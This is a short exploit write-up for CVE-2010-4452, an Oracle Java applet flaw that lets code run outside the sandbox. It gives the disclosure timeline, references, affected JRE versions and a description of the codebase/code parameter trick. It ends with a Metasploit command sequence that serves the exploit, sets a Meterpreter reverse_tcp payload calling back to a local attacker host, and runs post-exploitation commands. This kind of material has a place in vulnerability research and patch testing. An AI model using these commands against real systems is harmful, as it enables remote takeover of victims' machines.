CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit

Timeline :

Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI the 2010-09-28
Coordinated public release of advisory the 2011-02-15
Vulnerability details publicly released by Frederic Hoguin the 2011-03-11
Metasploit PoC provided the 2011-03-15

PoC provided by :

Frederic Hoguin
jduck

Reference(s) :

CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle

Affected version(s) :

Oracle JRE 6 & JDK 6 Update 23 and before

Tested on Windows XP SP3 with :

Oracle JRE 6 Update 16

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A “codebase” parameter that points at a trusted directory 2. A “code” parameter that is a URL that does not contain any dots the applet will run outside of the sandbox.

Commands :

use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid